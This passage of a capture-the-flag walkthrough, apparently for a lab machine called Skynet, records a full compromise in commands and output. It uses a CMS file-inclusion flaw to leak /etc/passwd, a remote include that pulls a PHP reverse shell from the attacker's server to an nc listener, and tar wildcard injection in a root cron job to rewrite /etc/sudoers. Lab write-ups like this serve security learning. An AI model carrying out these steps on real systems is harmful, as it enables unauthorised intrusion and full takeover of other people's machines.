https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

I tried to exploit the squirrel mail but it was not possible probably because there is a misconfiguration or something was just bad, so I moved on to the CMS exploit.

Finally I have sucess with the RFI and LFI using this exploit:

https://www.exploit-db.com/exploits/25971

Using the file alertConfigField.php and the unsanitized get parameter urlConfig.

http://10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php

I tested the exploit leaking the file sensitive system file /etc/passwd

http://10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php=urlConfig= ../../../../../../../../../etc/passwd

Field configuration:
root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync games❌5:60:games:/usr/games:/usr/sbin/nologin man❌6:12:man:/var/cache/man:/usr/sbin/nologin lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail❌8:8:mail:/var/mail:/usr/sbin/nologin news❌9:9:news:/var/spool/news:/usr/sbin/nologin uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy❌13:13:proxy:/bin:/usr/sbin/nologin www-data❌33:33:www-data:/var/www:/usr/sbin/nologin backup❌34:34:backup:/var/backups:/usr/sbin/nologin list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog❌104:108::/home/syslog:/bin/false _apt❌105:65534::/nonexistent:/bin/false lxd❌106:65534::/var/lib/lxd/:/bin/false messagebus❌107:111::/var/run/dbus:/bin/false uuidd❌108:112::/run/uuidd:/bin/false dnsmasq❌109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd❌110:65534::/var/run/sshd:/usr/sbin/nologin milesdyson❌1001:1001:,,,:/home/milesdyson:/bin/bash dovecot❌111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull❌112:120:Dovecot login user,,,:/nonexistent:/bin/false postfix❌113:121::/var/spool/postfix:/bin/false mysql❌114:123:MySQL Server,,,:/nonexistent:/bin/false 

So the next idea was to include a remote file from my computer with a reverse shell. Knowing that the skynet machine can run PHP I just downloaded a reverse shell from here:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

I made it accesible with python and also setup a nc listener:

python3 -m http.server 7777

nc -lvp 8889

Finally trigering the file:

10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.😄:7777/shell2.php

listening on [any] 8889 ...
10.10.😄: inverse host lookup failed: Unknown host
connect to [10.9.😄] from (UNKNOWN) [10.10.😄] 54896
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 16:20:17 up  1:52,  0 users,  load average: 0.00, 0.06, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

User flag:

$ cat user.txt
7ce5c2109a40f958099283600a9ae807
$ ls -lrta
total 4584
-rwxr-xr-x 1 root       root            74 Sep 17  2019 backup.sh
drwxr-xr-x 5 milesdyson milesdyson    4096 Sep 17  2019 ..
drwxr-xr-x 2 root       root          4096 Sep 17  2019 .
-rw-r--r-- 1 root       root       4679680 Jun 17 16:23 backup.tgz

4 - Post-Exploitation and privilege escalation

Now I have a low privileged user. I started enumerating basic things, one of those was the crontab:

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/backup.sh
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

Great, a one minute crontab as root using a shell script in the milesdyson /home.

The shell script contains:

$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

This is good, because I got the user www-data who can write on the path /var/www/html and also there is a flaw when using tar with a wildcard:

https://int0x33.medium.com/day-67-tar-cron-2-root-abusing-wildcards-for-tar-argument-injection-in-root-cronjob-nix-c65c59a77f5e

The approach is to make my low privileged user sudoer without password to scalate privileges. Setting what the exploit says on /var/www/html.

$ echo 'echo "www-data  ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh      
$ echo "" > "--checkpoint-action=exec=sh privesc.sh"
$ echo "" > --checkpoint=1

A few seconds later and after some date commands to know how many seconds left to gain one minute on the system.

$ date
Thu Jun 17 16:28:55 CDT 2021
$ date
Thu Jun 17 16:28:57 CDT 2021
$ date
Thu Jun 17 16:28:58 CDT 2021
$ date
Thu Jun 17 16:28:59 CDT 2021
$ date
Thu Jun 17 16:29:00 CDT 2021
$ date

I could not use sudo with my shell because I forgot to upgrade the shell with the trusty python:

$ python -c 'import pty; pty.spawn("/bin/bash")'

After that I can use sudo without restrictions:

$ sudo bash

Rooted:

root@skynet:/var/www/html# id && whoami && uname -a
id && whoami && uname -a
uid=0(root) gid=0(root) groups=0(root)
root
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Thanks for reading!